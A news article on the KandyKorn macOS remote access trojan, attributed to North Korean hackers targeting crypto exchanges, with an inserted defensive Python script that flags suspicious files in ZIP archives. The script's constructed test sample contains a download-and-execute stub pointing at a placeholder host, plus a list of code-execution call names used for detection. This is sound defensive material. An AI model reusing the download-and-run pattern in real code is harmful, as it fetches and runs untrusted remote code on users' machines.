
North Korean Hackers Hit Apple and Crypto Exchanges with macOS Malware


Cybersecurity Alert: macOS Malware “KandyKorn” in Circulation

North Korean hacking entities, believed to be associated with the well-known Lazarus Group, have been actively targeting cryptocurrency exchanges, deploying a new strain of macOS malware known as KandyKorn. The attackers have been reported to impersonate blockchain engineers on popular platforms like Discord to lure their victims.

Ingenious Social Engineering Tactics

Elastic Security Labs, a cybersecurity research firm, has uncovered that these cybercriminals use advanced social engineering tactics. They trick unsuspecting victims into downloading a ZIP file containing the malware, disguised as a cryptocurrency arbitrage bot, a tool designed to take advantage of price differences between exchanges.

Watcher.py: The Trigger for KandyKorn

The initial infection starts with the victim downloading a Python file, which subsequently downloads and executes Watcher.py. This script is the gateway to the infection chain known as REF7001, leading to the execution of the KandyKorn malware.
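As an added example (not taken from the Elastic Security Labs report or this article), a defender can statically triage a downloaded ZIP before anything in it is run, flagging Python members that both reach the network and launch code, which is the download-and-execute shape described above. The module and call-name lists, the sample archive and the `example.invalid` URL are constructed for this illustration.

```python
import ast
import io
import zipfile

# Heuristic name lists chosen for this example; not indicators from the report.
NETWORK_MODULES = {"urllib", "requests", "http", "socket"}
EXEC_CALLS = {"exec", "eval", "system", "popen", "Popen", "run", "call",
              "check_output", "import_module", "__import__"}

def _call_name(node):
    f = node.func
    return f.id if isinstance(f, ast.Name) else getattr(f, "attr", "")

def triage_source(source):
    """Return (network_imports, exec_calls) found in one Python source string."""
    nets, execs = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            nets |= {a.name.split(".")[0] for a in node.names} & NETWORK_MODULES
        elif isinstance(node, ast.ImportFrom) and node.module:
            nets |= {node.module.split(".")[0]} & NETWORK_MODULES
        elif isinstance(node, ast.Call) and _call_name(node) in EXEC_CALLS:
            execs.add(_call_name(node))
    return sorted(nets), sorted(execs)

def triage_zip(data):
    """Map each .py member that both imports a network module and executes code to its findings."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".py"):
                continue
            try:
                nets, execs = triage_source(zf.read(name).decode("utf-8", "replace"))
            except SyntaxError:
                flagged[name] = (["unparseable"], [])  # cannot be cleared statically
                continue
            if nets and execs:
                flagged[name] = (nets, execs)
    return flagged

def build_sample_zip():
    """Constructed sample: one benign helper and one download-and-run stub (never executed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bot/prices.py", "import json\n\ndef spread(a, b):\n    return abs(a - b)\n")
        zf.writestr("bot/main.py",
                    "import urllib.request, subprocess\n"
                    "urllib.request.urlretrieve('https://example.invalid/stage.py', '/tmp/stage.py')\n"
                    "subprocess.run(['python3', '/tmp/stage.py'])\n")
    return buf.getvalue()
```

A hit is a prompt for manual review, not a verdict: names such as `run` also appear in benign code, and obfuscated loaders can evade name matching.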

Capabilities of the KandyKorn RAT

KandyKorn operates as a remote access trojan (RAT) and a backdoor. Its capabilities include data exfiltration, directory listing, secure file deletion, and file upload and download.


Stealthy Communication Tactics

The Elastic researchers noted that KandyKorn stands out for its communication protocol with its command-and-control (C2) server. The malware awaits commands rather than continuously polling for them, which reduces its footprint and chances of being detected.

Ongoing Threat Activity Since April 2023

The malware campaign is believed to have commenced in April 2023 and remains active. The cybercriminals continue to refine their tools and techniques, with RC4 key encryption for KandyKorn C2 and Sugarloader being the latest developments.

Rising Concerns Over Cryptocurrency Exchange Security

This latest attack vector reiterates that macOS users are not immune to sophisticated malware campaigns, especially in the lucrative cryptocurrency sector. The Money Mongers, an independent think tank, has reported significant losses in the crypto industry due to such cyber attacks, with a staggering $12.36 billion lost since 2011.

A Yearly Snapshot of Crypto Hacks

According to their data, 297 crypto-related hacking incidents have occurred this year alone, translating to an industry loss of approximately $216,000 every hour. Chainalysis’s reports highlight 2022 as the most detrimental year for crypto businesses, with losses summing up to $3.8 billion due to hacks.

Record-Breaking Thefts by the Lazarus Group

Notably, the Lazarus Group, reputedly backed by the North Korean government, has been implicated in the theft of an extraordinary $1.7 billion in cryptocurrencies across various hacking operations, setting a new record for the group’s criminal activities.

Enhanced Security Measures: A Call to Action

The findings by The Money Mongers underscore an urgent call for fortified security measures within the cryptocurrency domain. As the threat landscape evolves, so too must the industry’s defense mechanisms to safeguard against these increasingly sophisticated cyber threats.
